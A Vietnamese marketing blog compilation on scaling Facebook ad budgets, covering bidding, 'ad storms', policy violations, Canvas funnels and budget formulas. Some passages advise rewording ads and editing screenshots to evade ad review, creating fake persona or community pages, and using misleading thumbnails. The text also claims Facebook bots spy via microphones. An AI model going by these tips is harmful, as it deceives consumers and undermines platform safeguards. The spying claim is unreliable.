  Cứ về nhà, nhập thêm hàng, tuyển thêm nhân viên, thuê thêm mặt bằng …v…v…Sau đấy thì x10 x100 ngân sách quảng cáo lên, theo đúng công thức thành công của các thầy … thì SML =)) Khốn nạn là lúc ấy có phải chỉ lỗ tiền quảng cáo đéo đâu mà còn lỗ cmnl cả tiền hàng, tiền vận hành .v..v… Bán xe bán nhà chỉ trong vài tuần thậm chí vài ngày =))TẠI SAO LẠI MÂU THUẪN NHƯ THẾ ? Các thầy đã chơi trò ảo thuật gì ? Rõ ràng học viên đã làm theo đúng lời thầy, ngồi ở lớp đã kiếm ra tiền nhanh thế cơ mà ????

  Bản chất câu chuyện thực ra rất đơn giản, VÌ TRƯỚC LÚC ĐI DẠY CÁC THẦY CŨNG ĐÉO DÁM TIÊU NHIỀU TIỀN BAO GIỜ =)) Các lý thuyết/ định nghĩa/ sáng tạo của các thầy, cũng chỉ góp nhặt được bo nhỏ trong ngân sách mà các thầy từng được làm hay ngồi xem người khác làm. Vậy nên, thầy nghĩ như thế là ok, done đặt cho nó một cái tên kêu vkl rồi đem đi dạy thoai.

  Ngay cả những người đi học phây búc bây giờ, đa phần cũng có cái suy nghĩ kiểu chụp giật ấy. Họ đến lớp học, không học để HIỂU BẢN CHẤT ĐỂ ỨNG DỤNG VÀO KINH DOANH CỦA MÌNH CHO PHÙ HỢP mà chỉ cố copy làm sao cho giống kiểu chạy của thầy ( họ nhìn thấy thầy có nhà có xe thì mặc nhiên cho là thầy làm đúng hết ). Thế nên khi ngồi ở lớp thực hành, họ thấy bỏ ra 500k kiếm về 2tr 3tr là siêu nhân vkl rồi, nghĩ ngay rằng bỏ ra 50tr / ngày thì buôn tiền kiếm cả mấy trăm triệu / ngày ấy chứ =)) Suy nghĩ thần kinh ấy, cũng góp phần cho việc các loại thầy bà phây búc chả hiểu con mẹ gì về kỹ thuật cứ mọc lên như nấm hiện nay, cũng giúp quý bạn và các vị bán xe, bán nhà, nợ nần nhiều hơn !

  Chúng ta cần phải hiểu với nhau rằng, lúc mới chạy quảng cáo kinh doanh trên phây búc. Lợi nhuận có được ngay lúc ban đầu chỉ là chiến thuật nhỏ, nó không bao giờ quan trọng bằng TƯ DUY MỞ RỘNG NGÂN SÁCH LÚC BẠN ĐÃ BẮT ĐÚNG TREND, ĐÚNG SẢN PHẨM.

  Trong bài này, tôi sẽ gạt qua một bên các yếu tố về chiến lược chọn sản phẩm, quản lý vận hành, kỹ thuật làm nội dung .v…v.. mà tôi sẽ chỉ tập trung vào PHÂN PHỐI VÀ NGUỒN PHÂN PHỐI QUẢNG CÁO + BẢN CHẤT BID ĐẤU GIÁ. Từ đó đưa ra các kỹ thuật để quản lý rủi ro bid của giá thầu khi tăng ngân sách quảng cáo một cách tối ưu nhất.

  PHÂN PHỐI VÀ NGUỒN PHÂN PHỐI QUẢNG CÁO

  Bản chất của phân phối quảng cáo trên phây búc là NGẪU NHIÊN TỨC THỜI. Không một ai, kể cả các thầy hay Mark xoăn biết được rằng lúc hiển thị QC, người dùng có mua sản phẩm của bạn hay không. Điều này ảnh hưởng gì đến chiến lược x ngân sách? Từ từ đã, để tôi nói rõ cho bạn hiểu về những thứ phây búc đang làm với người dùng.

  Khoảng hơn 1 năm trở lại đây, phây búc đổ hàng trăm triệu $ vào việc nghiên cứu & ứng dụng AI ( các con bot có trí tuệ nhân tạo ) nhằm mục đích quản lý số lượng người dùng khổng lồ. Các con bot này có thể sử dụng mic, camera, theo dõi lịch sử chát, ghi nhận thiết bị, theo dõi các hành động vuốt, touch, xoay ngang trên màn hình của các bạn ( công nghệ tracking pixel )..v…v…

  Từ các dữ liệu thu thập được với những người dùng riêng lẻ bot sẽ đưa ra các kết quả phù hợp nhất hiển thị trên Feed của các bạn theo thói quen của chính các bạn, nói trắng ra chúng ta đã mất hoàn toàn quyền riêng tư khi đồng ý sử dụng phây búc.

  Quan trọng hơn hết, vì có công nghệ AI nên các con bot này có thể TIẾN HÓA theo thời gian. Việc này dần làm mất đi ý nghĩa của Target, bởi vì giả thiết rằng cho dù tôi điền trên phây búc rằng tôi thích ferrari, thích iphone ..v..v… vậy nhưng thực tế tôi lại đi dream II, hay nói chuyện với bạn bè về samsung… Đoán xem tôi sẽ ăn quảng cáo nào vào mặt ? =))

  Sức mạnh của interest, hoặc những yếu tố khi chúng ta chọn target cho quảng cáo đã dần mất đi. Và thời điểm này, nếu bạn càng chọn target theo kiểu lý thuyết SUPER TARGET và càng cố bóp tệp khách hàng của mình theo kiểu bo nhỏ củ kẹc gì các thầy dạy, thì kết quả các bạn càng chạy càng lỗ, chỉ đổ tiền ngu nhiều hơn mà thôi.

  Tóm lại: CHỈ CHỌN 1 HOẶC 2 YẾU TỐ TARGET ĐẶC THÙ NHẤT VỚI SẢN PHẨM CỦA BẠN ( ĐỂ TỆP KHÁCH HÀNG LỚN NHẤT CÓ THỂ SO VỚI NGÂN SÁCH ). Việc phân phối quảng cáo để phây búc lo! Vì bot thì không biết nói dối hay bốc phét viễn tưởng như các thầy =))

  Tiếp theo, chọn nguồn phân phối quảng cáo nào ?

  Tôi hay nói với mọi người rằng, đừng nghĩ là người mỹ thì họ sẽ đàng hoàng. Trong bài toán về nguồn phân phối quảng cáo, rõ ràng phây búc đã chơi rất bẩn. Cụ thể khi các NQC tạo ra các quảng cáo, phây búc đã full check với tất cả các NPPQC nhằm một mục đích duy nhất là tiêu được thật nhiều tiền của NQC bất chấp hiệu quả tốt xấu. Đáng ra họ nên đưa ra các lời khuyên để NQC lựa chọn nguồn phân phối quảng cáo phù hợp với sản phẩm của mình. Tại sao họ lại cố tình làm như vậy ?

  Vào năm 2016, chỉ số frame quảng cáo / new feed phây búc đâu đó vào khoảng 10 – 12 khung thì có 1 khung quảng cáo. Đầu năm 2017 thì chỉ số ấy là 7, và hiện tại tháng 10 thì là 5 nghĩa là cứ 5 khung tin thì có 1 khung quảng cáo. Tăng gấp đôi so slot quảng cáo so với năm ngoái, thế nhưng số lượng NQC thì tăng không biết bao nhiêu lần, tổng ngân sách đổ vào phây búc x nhiều lần so với năm ngoái.

  Hẳn nhiên, bản thân phây búc cũng bị áp lực PHẢI TIÊU HẾT NGÂN SÁCH CHO NQC. Và họ đẻ ra đủ thứ NPPQC khác như instagram, video, bài viết tức thời, cột bên phải ..v…v… Dễ nhận thấy là nếu để bán sản phẩm trên phây búc, các NPPQC này hầu như không có hiệu quả, thế nhưng NQC vẫn phải trả tiền cho mỗi CPM hiển thị.

  Tóm lại: Trong mục NPPQC bỏ con mẹ nó hết check đi, chỉ để lại nguồn newfeed phây búc thoai. Tất nhiên một số chiến dịch chạy phủ brand đặc thù thì lại phải làm ngược lại cho rẻ :))

  BẢN CHẤT BID ĐẤU GIÁ QUẢNG CÁO PHÂY BÚC

  Nói rõ BẢN CHẤT BID ĐẤU GIÁ trên phây búc, phải bắt đầu từ nền tảng quảng cáo của fb là gì ? Nếu các bạn để ý, trong bất kỳ nền tảng quảng cáo CPM, CPC, CPA lớn nào trước đây ví dụ như google adwords, các ads net khác…,

  khi các bạn bid giá thầu càng cao. Thì các chỉ số hiệu quả hiển thị quảng cáo sẽ lên cao theo vì được QC của các bạn vào được các vị trí ngon TOP đầu. Dễ hiểu bởi vì quảng cáo trong các nền tảng khác là QUẢNG CÁO THEO NHU CẦU/NGỮ CẢNH KHÁCH HÀNG.

  Còn phây búc, khi sinh ra mục đích của nó là để làm một CỘNG ĐỒNG ONLINE CÓ TÍNH KẾT NỐI SIÊU CAO ( đầu tiên chỉ là trong trường đại học của Mark xoăn ). Nền tảng quảng cáo là một sản phẩm hoàn toàn phái sinh về sau này với kiểu quảng cáo GỢI Ý CHO NGƯỜI DÙNG,

  khi số lượng người dùng ở mức khổng lồ. Và các bạn có biết ngay cả khi số lượng người dùng trên toàn thế giới đạt ngưỡng cả 100 triệu mà Mark xoăn cũng không thèm làm quảng cáo? Đây chính là chiến lược hàng đầu, giúp phây búc trở thành một đế chế tỷ người dùng như ngày hôm nay.

  Tại sao ? Vì một nền tảng cộng đồng chỉ tồn tại và phát triển bứt phá được khi người dùng ÍT CẢM THẤY BỊ LÀM PHIỀN NHẤT, Mark Xoăn vẫn giữ chiến lược ấy cho đến ngày hôm nay.

  Với chiến lược này, rõ ràng khi xây dựng nền tảng quảng cáo. Họ đã phải chọn giữa việc kiếm thật nhiều tiền nhanh nhất có thể từ các nhà quảng cáo NQC ( rất làm phiền người dùng ) & việc kiếm tiền chậm hơn mà người dùng vẫn cảm thấy hài lòng. Họ đã chọn vế sau, cụ thể bằng việc họ xây dựng lên những thuật toán đấu giá quảng cáo phức tạp hơn, nhiều rule hơn, hoàn toàn khác biệt so với các nền tảng quảng cáo trước đây.

  Ngoài ra một điều các bạn phải biết, mỗi một giây, hệ thống đấu giá của phây búc xử lý hàng tỷ phiên đấu giá. Dù ngân sách các bạn 1$ hay 100k $ thì vẫn phải đấu giá để cạnh tranh slot quảng cáo với nhau. Vậy nên, trên phây búc không có gì gọi là đối thủ. TOÀN BỘ NQC LÀ ĐỐI THỦ CỦA NHAU

  Có 4 yếu tố cơ bản ảnh hưởng đến BID giá thầu:

  1. Chỉ số tương quan ngân sách & khối lượng tệp khách hàng
  2. Chỉ số điểm phù hợp của quảng cáo đối với mỗi / 500 hiển thị người dùng
  3. Chỉ số tần suất hiển thị / 1 người dùng ( bão hòa tệp khách hàng )
  4. Chỉ số cạnh tranh giá thầu khi chạy nhiều nhóm trong cùng 1 chiến dịch

  Tóm lại: Các bạn khi chạy test sản phẩm ngon rồi và muốn X10, X100 ngân sách chú ý đảm bảo các chỉ số sau:

  • Tính toán ngay từ đầu số ngày sẽ chạy chiến dịch bằng công thức: (Lấy tổng khối lượng tệp khách hàng*80%) / số reach dự kiến theo ngân sách. ( ví dụ tôi có tệp khách 2 triệu, reach dự kiến là 133k / ngày vậy tôi sẽ chạy ads max trong 15 ngày )
  • Theo dõi 3 ngày 1 lần chỉ số phù hợp nội dung QC đối với người dùng luôn ở mức 8, 9, 10
  • Theo dõi 3 ngày 1 lần chỉ số tần suất, đảm bảo luôn ở 1 – 1,2
  • Nhân không quá nhiều nhóm quảng cáo, để ngân sách từng nhóm theo kế hoạch chạy và tắt các nhóm có giá thành cao.
  • Cuối cùng tối ưu với cả chỉ số tốt nhìn nguy hiểm làm đéo gì khi mà chỉ số CHUYỂN ĐỔI đơn hàng thấp? Thấy đơn ra thì giữ, đơn chưa ra thì drop chiến dịch cmnl và ngay, xong làm camp mới thoai ace ei =))

  Các chú ý quan trọng:

  • Nghiên cứu và chọn các NPPQC thật chính xác dựa theo mục đích chiến dịch của bạn.
  • Việc nhân bao nhiêu nhóm quảng cáo, đặt ngân sách / từng nhóm phải được tính toán và thực hiện ngay từ đầu lúc tạo chiến dịch. Khi đã chạy không chỉnh sửa hay nâng ngân sách.
  • Chiến dịch chạy hết thời gian định trước ban đầu nếu còn hiệu quả ra đơn thì tiếp tục giữ. Nếu đã đạt điểm bão hòa tỷ lệ chuyển đổi đơn hàng, thì không cố chỉnh sửa hoặc nhân nhóm quảng cáo mà dừng để tạo chiến dịch mới.

 • Bão ads phây búc là gì ? Cách xử lý, tối ưu quảng cáo trong những ngày bão ập về

  Một buổi sáng đẹp trời bạn thức dậy, nhấp ngụm trà/cafe đầy mùi vị hư vinh từ những ngày chạy ads giá rẻ, đem lại lợi nhuận ổn định cho công ty.

  Như một thói quen, bạn bật màn hình ads lên để kiểm tra các chỉ số ads của ngày hôm qua. Bạn tá hỏa vì ads hôm nay đắt gấp 3, 5 thậm chí 10 lần mọi ngày. New feed ngập tràn những lời kêu gào chuyện bid giá quảng cáo bị cao lên bất thường. Hoặc ngược lại, tài khoản ads chẳng thấy cắn tiền, ko tiêu thêm xu nào. Xin chào bạn, bão đã về đến bản làng bạn rùi đấy =))

  Để có phương án xử lý chuẩn xác, trước hết chúng ta cần phải hiểu rõ chuyện gì đang xảy ra. Tại sao hệ thống phân phối quảng cáo của phây búc bị mất ổn định như vậy ?

  Có 2 nguyên nhân chính

  1. Có big update hệ thống liên quan đến: quản lý user,quảng cáo, giao diện người dùng. ( Bão ngắn ngày )

  2. Scan gì đó trên diện rộng: content, clone, page, group: việc này nhằm giảm thiểu user giả mạo và page, group có nội dung không phù hợp chính sách cộng đồng. ( time bão lâu, dai dẳng hơn)

  Đây là các nguyên nhân cùng gây ra việc hệ thống quản lý User bằng AI của phây búc bị pending hoặc overload. AI không đủ data, không đủ thời gian máy học để tối ưu phân phối quảng cáo cho ads ===> ads bị phân phối sai ===> Kết quả là ads của các bạn bị đắt sml, hoặc éo thèm cắn.

  PHƯƠNG PHÁP XỬ LÝ:

  1. Tạo bản sao chép camp đang chạy đắt ra, chỉnh lại tệp khách hàng nhỏ lại 30% – 50%. Chia luồng phân phối quảng cáo bằng cách nhân thêm 10-20 nhóm qc.

  2. Theo dõi ads, cứ sau mỗi 1000 lượt reach mà thấy kết quả vẫn quá đắt => Tắt camp, rùi bật lại. Khi nào chỉ số ok thì thôi !

  Chú ý: camp tạo dạng này chỉ nên chạy trong 2 3 ngày, hết bão thì nên tắt đi tạo camp mới ?

 • 9 lỗi VPCS gây bất thường tài khoản và cách khắc phục

  Đang vit ads sướng thì … die tài khoản. Rồi thì cả công ty ngơ ngác nhìn nhau như lũ người trời, chán chẳng thiết ăn uống gì nữa…

  Thậm chí bi đát hơn là die hết sạch cả tài khoản ads, không có lấy 1 con để… được tiêu tiền… bla bla bla…

  Rất nhiều trường hợp kiểu như thế đã cầu cứu chưởng môn, inbox thậm chí gọi điện thoại cầu cứu. Nói thật là đến bây giờ bản thân chưởng môncòn không thuộc hết các lỗi… không phê duyệt của hệ thống Facebook Ads. Tạm thời thì binh đến tướng chặn, nước lên thuyền lên thôi. Anh em chú ý các lỗi dễ mắc phải cũng như chỉnh sửa sao cho ngôn ngữ lắt léo một chút để tránh tài khoản đội nón ra đi nhé ?

  CÁC LỖI VI PHẠM CHÍNH SÁCH THƯỜNG GẶP :

  1 : Vi phạm do hình ảnh có nút xem video ( Vuông , tam giác trong hình ảnh ) (ảnh minh họa 1.1-1.2)

  2 : Vi phạm do quảng cáo việc làm tại nhà , bán hàng đa cấp , làm giàu nhanh , các cách kiếm tiền phi pháp (ảnh minh họa 2.1-2.2)

  3 : Vi phạm do nội dung có từ ngữ tục tĩu ( kiểm tra lại nội dung , link web , hình ảnh .  thể dùng #hstag , thay đổi chữ cái đầu , dùng các dấu câu để lách )  (ảnh minh họa 3.1-3.2)

  4 : Vi phạm nội dung đến cơ hội nhà ở , việc làm , tín dụng , hành động ám chỉ . (ảnh minh họa 4.1-4.2) ( nếu có nút xác nhận tuân thủ thì xác nhận là sẽ được duyệt)

  5 : Vi phạm do nội dung có quá nhiều biểu tượng icon , sai ngữ pháp , lạm dụng dấu câu hay dùng chữ viết hoa quá nhiều . (ảnh minh họa 5.1-5.2)

  6 : Vi phạm sử dụng thương hiệu của facebook hoặc instagram , không viết hoa chứ F&I , sử dụng viết tắt FB hoặc IG , hình ảnh chụp màn hình FB , IG . (cắt tất cả các ảnh chụp màn hình loại bỏ các phần ảnh có thanh công cụ phía trên và dưới của FB , in màu chụp lại góc nghiêng và PTS chỉnh sửa lại.) (ảnh minh họa 6.1-6.2)

  7 : Vi phạm nội dung quảng cáo chất kích thích , các vật dụng cho ng sử dụng , thuốc lá , khói . (ảnh minh họa 7.1-7.2)

  8 : Vi phạm do nội dung hình ảnh tư thế khiêu dâm , khoe ngực . . . (ảnh minh họa 8.1-8.2)

  9 : Vi phạm nội dung quảng cáo các dịch vụ phi pháp , cung cấp bạn bình hay cho vay tín dụng . . . (ảnh minh họa 9.1-9.2)

 • Kỹ thuật 14 bước dùng Canvas + Messenger để 5k 10k 1 tin nhắn

  Đúng như lời hứa, sau ngày 28/11 chưởng môn đã xong công việc và có thời gian. Nên ngồi biên bài này để ace chạy ads có cơ hội khai thác quảng cáo Facebook ở một khía cạch khác.

  Trước đến nay chúng ta hầu như chỉ chạy quảng cáo bán hàng theo 2 kiểu TƯƠNG TÁC + TIN NHẮN, cả hai kiểu quảng cáo truyền thống này sẽ bị hạn chế về trải nghiệm khách hàng với những ngành khó (đòi hỏi đưa đẩy cảm xúc mua hàng của khách hàng lên cao trào)  ví dụ: Làm đẹp, đông y, sản phẩm cao cấp đắt tiền, phong thủy…v…v…

  Để cho dễ hiểu, các bạn hình dung một bài post quảng cáo chỉ bao gồm 2 phần: Nội dung + media đối với khách hàng chỉ giống như 1 bài giới thiệu về sản phẩm. Trong một khoảng không gian hạn hẹp như vậy, đương nhiên hầu như nhà quảng cáo chỉ có thể truyền tải 1 thông điệp, không thể dẫn dắt cảm xúc của người dùng trầm bổng theo như ý mình.

  Còn trên canvas cấu trúc landing page thu gọn, chia nhiều phần tách biệt linh hoạt (tiêu đề, nội dung, hình ảnh, video, nút, quay vòng) giúp chúng ta có thể tạo ra nhiều line cảm xúc, chi phối cảm xúc của khách hàng tốt hơn, đưa ra nhiều thông điệp + giải pháp để thúc đẩy hành vi mua hàng LẬP TỨC của khách hàng ===> tăng tỷ lệ chuyển đổi đơn hàng thành công.

  Giới thiệu qua vậy thôi, dưới đây là 14 bước chưởng môn sẽ hướng dẫn các bạn sử dụng canvas kết hợp với messenger tạo ra chuyển đổi đơn hàng với mức giá siêu rẻ ^^ Chúc các vị và quý bạn 1 đêm mất ngủ thành công =))

  Đoạn này chọn đội ngũ dự án, mình cho rằng đây là tính năng rất tuyệt vời khi làm việc nhóm. Các bạn có thể share mẫu cavans cho cả team chỉ với 1 vài động tác phân quyền đơn giản.

  Bạn chọn biểu mẫu theo từng mục đích sử dụng, mình thường chọn chinh phục khách hàng mới. Vì mục đích cuối cùng của mình là chuyển khách đến inbox hoặc page + website

  Các bạn có thể thay ảnh đầu tiên bằng 1 video, tuy nhiên nên làm video dưới 1 phút các bạn nhé   Max canvas cho phép chúng ta cho thêm 10 ảnh vào mẫu quảng cáo.

  Ở đoạn trên bạn phải chú ý dòng trang đích cuối cùng ko điền link m.me mà điền link landing page hoặc webiste ( nhớ cài inbox messenger Facebook tích hợp website  như longhn.com nhé ) Bây giờ chúng ta sẽ nhập mẫu Cavans vào tài khoản quảng cáo + page:

  DONE, vậy là chúng ta đã set 1 camp canvas + mess thành công. Bạn có thể nâng cao kỹ năng của mình bằng cách ngồi tạo ra một bản trải nghiệm tùy chỉnh theo ý của mình. Trong phần này Facebook cho phép tùy chỉnh với 6 thành phần: Nút, tiêu đề, nội dung, ảnh, video, quay vòng ) sẽ mất thời gian hơn chút nhưng mình khuyến khích các bạn vọc phần này.

  Thành quả chúng ta thu được đây, người dùng chỉ cần touch vào ảnh là nhẩy thằng vào inbox ( các bạn nên set auto chào khách để thôi thúc khách hàng ) hoặc vuốt là nhẩy vào trang web ( hoặc page ) ===> vào ma trận chốt sale tập 2. Have fun man

 • Bán hàng online, chi phí quảng cáo bao nhiêu là đủ?

  Nhiều lúc bản thân các boss giao việc cho nhân viên chạy quảng cáo nhưng cũng ko biết nên giao KPI như thế nào?

  Hoặc đôi khi ngay chính các bạn chạy ads cũng bị bối rối khi doanh số tăng giảm đột biến và rồi ko biết chi phí quảng cáo của mình chạy như vậy có ổn chưa??

  ? 2 bảng tính chi phí quảng cáo online made by longhn.com dựa trên giá bán sản phẩm và doanh số sẽ ngay lập tức giúp các bạn có đáp án. Đây tuy là những thống kê chưa được chính xác, một số còn là dự đoán tuy nhiên nó sẽ giúp các bạn góc nhìn về một bức tranh toàn cảnh và các bạn sẽ biết mình cần chọn gì.

  Chưởng môn đã rất cân nhắc giữa các dữ liệu thống kê cả của Việt Nam + Nước ngoài, đồng thời tôi cũng dự đoán chỉ số dựa trên những kinh nghiệm, trường hợp mà tôi đã từng trải nghiệm ở nhiều ngành sản phẩm khác nhau tại thị trường Việt Nam.

  Hy vọng nhận được sự phản hồi, cũng như chỉnh sửa từ các vị và quý bạn.

  ?Ok bắt đầu nào

 • Công thức tự động tính ngân sách quảng cáo và 4 chỉ số quan trọng để đạt DOANH SỐ bạn muốn

  Trong quá trình làm quảng cáo 100% chúng ta luôn đặt 2 câu hỏi:

  MUỐN KIẾM x7x TỶ / THÁNG thì cần những gì?

  Hay kiếm được x7x tỷ rồi thì như thế là tốt hay chưa tốt?, còn tốt hơn nữa được hem, lên x9x tỷ thì sao?

  Ka ka ka ? 6 dòng công thức bên dưới sẽ giúp các bạn có cái nhìn tổng quan hơn, đánh giá chiến dịch, hiệu quả hệ thống, và giúp các bạn định hướng rõ ràng những thứ cần chuẩn bị hơn khi lên kế hoạch tăng ngân sách quảng cáo nhằm đạt được DOANH SỐ MONG MUỐN.

  Công thức được chưởng môn phát triển từ buổi chia sẻ của một top ngành về chạy Ads thẩm mỹ viện khá lâu (bí danh nghệ nhân marketing Hoàng Anh Sơn đẹp trai tài giỏi vãi đái =)) ). Nếu có đọc thì cảm ơn ông em đã chia sẻ nhé

  Giả thiết gọi:

  Doanh số mong muốn là X

  Tổng SĐT để đạt được doanh số X là DTX

  Ngân sách quảng cáo là Y

  Giá dịch vụ ( hoặc giá dịch vụ trung bình ) là G

  Chỉ số chúng ta có được từ chiến dịch TEST:

  Giá / 1 sđt từ quảng cáo là GA

  Tổng SĐT về từ chiến dịch test là DT

  Số khách đặt lịch hẹn là KLH => %KLH = (KLH / DT)*100

  Số khách đến thực tế là KTT => %KTT = (KTT / KLH)*100

  Số khách mua là KM => %KM = (KM / KTT)*100

  Số khách mua Up sale là KUS => %KUS = (KUS/KM)*100

  ?? Chỉ số mẫu có từ chiến dịch test: G, GA, %KLH, %KTT, %KM, %KUS

  => Công thức để tính Y, KLH, KTT, KM, KUS, DTX cho 1 doanh số X bất kỳ:

  KM = X / G

  KTT = KM * (100/%KM) => ( Tính ra số nhân viên tư vấn thực tế cần )

  KLH = KTT * ( 100/%KTT) => ( Đánh giá hiệu quả chiến dịch + hiệu quả nhân viên tele sale )

  DTX = KLH * ( 100/%KLH) => ( Tính ra số tele sale cần để đạt doanh số )

  %KUS = (KUS/KM)*100 ( Đánh giá hiệu quả của NV tư vấn )

  => Ta có ngân sách quảng cáo Y= DTX * GA

  VÍ DỤ THỰC TẾ

  ? Ví dụ: Chiến dịch test ra 1000 số đt giá 70k 1 số, 200 khách đặt lịch hẹn, 100 khách thực tế đến, 20 khách mua gói 20 triệu + up sale thêm 5 khách = 500 triệu doanh số

  => %KLH = 20%

  => %KTT = 50%

  => %KM = 20%

  => %KUS = 25%

  GA = 70

  G = 20

  Vậy muốn khi muốn đạt doanh số X = 5000 triệu:

  KM = X / G = 5000 / 20 = 250

  KTT = KM * (100/20) = 1250

  KLH = KTT * ( 100/50) = 2500

  DTX = KLH * ( 100/20 ) = 12500

  => Ta có ngân sách quảng cáo Y= DTX * GA = 875 triệu

  Done, chưởng môn chúc anh chị em MFA gặp nhiều may mắn. Đạt được những kỳ vọng trong kinh doanh cũng như cuộc sống cá nhân. Đừng quên “Thời buổi 1 tuần đổi xe, 1 tháng mua nhà, ai nhanh thì được ” nhé ka ka

 • Quảng cáo Facebook Việt Nam 5 năm trước và xu hướng 5 năm sau

  Quảng cáo 5 năm trước.

  Việt Nam 2014 đổ về trước bạn biết thẻ tín dụng là gì, pay pal là gì để add vào chạy FB Ads thì bạn đã có thể làm giàu. Chưởng môn vẫn nhớ camp đầu tiên set lấy signup cho fxtot.com lúc 2013 mà mình set boot post… 8đ / tương tác… =)) Đậu má lúc ấy Forex chưa phát triển ai cũng chửi lừa ? Mình nản quá tiêu 500k xong đếch thèm set nữa ( hồi ấy chỉ có feed và cột bên phải + target ngu lém ) , chạy google xịn hơn.

  Chạy quảng cáo dễ lắm…

  Việt Nam 2015 – 2016:

  Có lẽ là làn sóng ” bán hàng facebook ” rộ lên mạnh nhất nhờ các thánh… Bán hàng rác giàu lên chỉ sau sau 6 đêm, chạy tương tác vẫn là sự lựa chọn số 1. Mua & bán hàng chưa bao giờ dễ thế cứ để lại sđt auto có người gọi hoặc vào chat, vài hôm sau hàng đã ở cửa nhà. Các hệ thống vận chuyển lớn cũng được hình thành trong khoảng thời gian này.

  Việt Nam 2017 – nửa đầu 2018:

  Sau 2 năm 2015 + 2016 bị càn quét ads rác thảm khốc, khách hàng đã được giáo dục kỹ hơn hay nói cách khác bị lừa nhiều thành khôn. Họ nhận ra mình cần nhiều thông tin về sp + thông tin shop hơn để ra quyết định mua hàng ( hay để lại sđt ). Rất may là khoảng tháng 2 năm 2017 thì Facebook bắt đầu áp dụng loại hình quảng cáo mới: tin nhắn. Lúc đầu, những người mà chưởng môn xúi chạy sang mục tiêu này có không ít người kiếm tiền tỷ. Vì đơn giản là giá lúc đỏ siêu rẻ, có lúc chỉ 2k 3k / 1 tin nhắn, đặc biệt tỷ lệ chuyển đổi vượt trội hơn tương tác rất nhiều hầu như bán gì cũng thắng. Vậy nhưng có vẻ loại hình Tin nhắn vẫn còn một số hạn chế mà chúng ta sẽ nói sâu hơn bên dưới.

  Việt Nam nửa sau 2018 – 2019

  Từ 2017 chưởng môn đã từng nói Landing chuyển đổi sẽ trở thành xu hướng quảng cáo mạnh mẽ thậm chí vượt qua cả tin nhắn. Và hiện tại chúng ta đều nhìn thấy rằng nó đã trở thành xu thế của cả thế giới không chỉ riêng Việt Nam. Tại sao? Chúng ta hãy nhìn lại 1 mẫu quảng cáo tin nhắn, gồm 2 phần text + media. Một mảnh đất quá nhỏ và nhàm chán với khách hàng để nhà quảng cáo có thể biểu diễn đầy đủ thông tin sản phẩm + công năng + ý tưởng + thông điệp + thông tin doanh nghiệp… Vân vân và mây mây… Và nếu chạy tin nhắn, khách hàng muốn tìm hiểu lại phải chat với shop. Mà hành vi người dùng thì ngày một lười hơn, đến nói chuyện cũng lười ka ka. Họ cần một thứ khác, rộng rãi hơn, liền mạnh hơn, đầy đủ thông tin thuyết phục họ hơn, trực quan hơn, sinh động hơn thay vì có mấy dòng text với dăm cái ảnh lộn xộn. Và thế là Landing chính là sự lựa chọn khả quan nhất ?

  Xem thêm: Khóa học chạy quảng cáo Facebook tại Hà Nội

  Quảng cáo 5 Năm sau:

  Việt nam 2020 – 2021

  Trong 2 năm này, các bạn sẽ được chứng kiến 1 kỷ nguyên của landing rõ nét, mạnh mẽ nhất. Bởi vì rất nhiều lợi ích nó đem lại mà chỉ những người đang chạy mới hiểu, lêu lêu các bạn hem bik landing là gì =)) Vậy nhưng sẽ giống 2015 2016, người dùng cuối sẽ được tận hưởng hàng loạt thứ phù phiếm ảo diệu từ các phù thủy marketing hay ông hoàng marketing vẽ ra trên landing. Và ở cuối giai đoạn này họ sẽ sợ mua qua landing vkl cho mà xem =)))))

  Việt Nam 2022-2023

  Khi khách hàng sợ hãi vì bị ăn quả draw quá nhiều, thì họ sẽ đòi hỏi một thứ gì đó chắc chắn hơn. Ví dụ như một WEB SHOP đầy đủ thông tin đkkd, đa dạng mặt hàng để chọn, tích hợp cổng thanh toán tiện lợi, chế độ bán hàng, sau bán hàng, các loại chứng nhận abc đầy đủ hơn. Chưởng môn cho rằng, lưu lượng truy cập đổ về web shop sẽ trở thành 1 trào lưu hot nhất trong khoảng thời gian này. Trừ khi, Facebook tạo ra 1 hình thái ecom mới nằm ngay trên chính nó. Có thể giúp người dùng xác thực người bán cũng như đa dạng thông tin hơn ví dụ như phát triển sâu hơn cho Market Place.

  Việt Nam 2024-2025

  Đây có lẽ sẽ là giai đoạn định hình xong thị trường trên quảng cáo Facebook. Các bạn sẽ được thấy những cuộc chiến điên rồ về giá quảng cáo của những siêu cá mập, trong đấy mọi sai lầm đều sẽ trả giá bằng sinh tồn. Thời điểm này chạy ĐA DẠNG MỤC TIÊU sẽ là sự lựa chọn khôn ngoan, hơn nữa xét về hành vi người dùng thì sẽ có sự ngược lý rằng: Số lượng người dùng tăng lên, nhưng hành vi mua hàng giảm đi. Lý do: họ chuyển dịch sang mua sàn tmđt lớn để được bảo hiểm khi mua hàng, so sánh giá hay khiếu nại đơn giản hơn. Nói như vậy không có nghĩa nhu cầu mua hàng trên Facebook sụt giảm, nhu cầu vẫn có chỉ là họ đòi hỏi tính chuyên nghiệp, sự khôn ngoan khi quảng cáo, khai thác cảm xúc của người làm quảng cáo ở những tầng sâu hơn rất nhiều trước đây.

  ? Thông qua bài này, chưởng môn hi vọng rằng những phân tích và dự đoán của chưởng môn sẽ giúp các bạn MFA có sự chuẩn bị cho mình. Định hướng phát triển rõ nét hơn, lựa chọn chiến thuật phù hợp hơn cho đội nhóm, công ty của mình. Tiếp tục duy trì phong độ, tiến lên phá thêm nhiều đảo nữa. Để chưởng môn có thể mỗi ngày đều tự hào tuy mình chưa giàu nhất Việt Nam, nhưng tạo ra thì có thật nhiều ?

 • 7 phương pháp giảm 50% giá quảng cáo trong 1 phút

  Chỉ với 7 phương pháp cực kỳ đơn giản dễ làm bên dưới, các bạn sẽ cực kỳ ngạc nhiên với hiệu quả đem lại cho mà xem ? Chưởng môn ĐẢM BẢO GIẢM ÍT NHẤT 50% nhé ka ka ka

  Ảnh số 1 chẳng liên quan gì đến sản phẩm =)))

  1/ Đặt tên page giống như một người bạn

  bình thường, ảnh đại diện là một khuôn mặt thân thiện dễ coi. Nội dung như 1 profile bình thường, link sang 1 webshop hoặc landing ( phù hợp với các dạng sản phẩm làm đẹp, mỹ phẩm, đông y )

  2/ Fake một trang cộng đồng,

  nội dung dạng chia sẻ kinh nghiệm hoặc tâm sự, cuối bài chốt sale. ( Phù hợp với các sản phẩm đồ gia dụng, nội thất trang trí, phụ kiện… )

  3/ Thay đổi ảnh đại diện của Video sang ảnh btv thời sự,

  ảnh hóng biến, ảnh hotgirl, hot boy… ( Phù hợp sản phẩm trend, sản phẩm thời vụ, sản phẩm bán 1 lần lãi cao )

  4/ Giật title theo trend mới nhất:
